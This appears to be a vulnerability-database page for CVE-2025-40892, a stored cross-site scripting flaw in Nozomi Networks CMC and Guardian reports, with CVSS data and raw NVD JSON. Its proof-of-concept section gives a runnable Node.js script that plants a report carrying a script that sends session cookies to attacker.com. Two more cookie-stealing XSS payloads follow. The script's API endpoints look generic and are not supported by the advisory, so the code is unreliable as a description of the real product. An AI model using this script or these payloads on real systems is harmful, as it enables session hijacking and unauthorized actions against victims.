Security Vulnerability Report
CVE-2025-40892 CVSS 8.9 HIGH

Published: 2025-12-18 14:15:59
Last Modified: 2026-04-14 10:16:27

Description

A Stored Cross-Site Scripting vulnerability was discovered in the Reports functionality due to improper validation of an input parameter. An authenticated user with report privileges can define a malicious report containing a JavaScript payload, or a victim can be socially engineered to import a malicious report template. When the victim views or imports the report, the XSS executes in their browser context, allowing the attacker to perform unauthorized actions as the victim, such as modifying application data, disrupting application availability, and accessing limited sensitive information.

CVSS Details

CVSS Score: 8.9
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nozominetworks:cmc:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nozominetworks:guardian:*:*:*:*:*:*:*:* - VULNERABLE
Nozomi Networks products - see the official security advisory NN-2025:13-01 for the specific affected versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-40892 Stored XSS PoC
// Target: Nozomi Networks Reports Functionality
// Prerequisites: Valid user account with report privileges
const axios = require('axios');

const TARGET_URL = 'https://target-system.com';
const USERNAME = '[email protected]';
const PASSWORD = 'password123';

async function exploit() {
  // Step 1: Authenticate
  const loginResponse = await axios.post(`${TARGET_URL}/api/auth/login`, {
    username: USERNAME,
    password: PASSWORD
  });
  const sessionCookie = loginResponse.headers['set-cookie'];

  // Step 2: Create malicious report with XSS payload
  const xssPayload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';
  const maliciousReport = {
    name: xssPayload,
    description: 'Malicious Report for CVE-2025-40892',
    type: 'custom',
    template: { content: xssPayload }
  };

  // Step 3: Submit the malicious report
  await axios.post(`${TARGET_URL}/api/reports`, maliciousReport, {
    headers: { Cookie: sessionCookie }
  });

  console.log('[+] Malicious report created successfully');
  console.log('[+] When victim views this report, XSS will execute');
}

exploit().catch(console.error);

// Alternative simpler payload for testing:
// <img src=x onerror="fetch('https://attacker.com/log?cookie='+document.cookie)">
// <svg/onload=fetch('https://attacker.com/exfil?data='+btoa(document.cookie))>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-40892", "sourceIdentifier": "[email protected]", "published": "2025-12-18T14:15:59.457", "lastModified": "2026-04-14T10:16:27.033", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stored Cross-Site Scripting vulnerability was discovered in the Reports functionality due to improper validation of an input parameter. An authenticated user with report privileges can define a malicious report containing a JavaScript payload, or a victim can be socially engineered to import a malicious report template. When the victim views or imports the report, the XSS executes in their browser context, allowing the attacker to perform unauthorized actions as the victim, such as modify application data, disrupt application availability, and access limited sensitive information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:H", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:H", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nozominetworks:cmc:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.5.0", "matchCriteriaId": "91C795BB-9FFC-4FB0-B686-38DA32ACD478"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nozominetworks:guardian:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.5.0", "matchCriteriaId": "5FBA5D15-9BD3-4062-8560-FEB7FDF4180D"}]}]}], "references": [{"url": "https://security.nozominetworks.com/NN-2025:13-01", "source": "[email protected]", 
"tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-827968.html", "source": "0b142b55-0307-4c5a-b3c9-f314f3fb7c5e"}]}}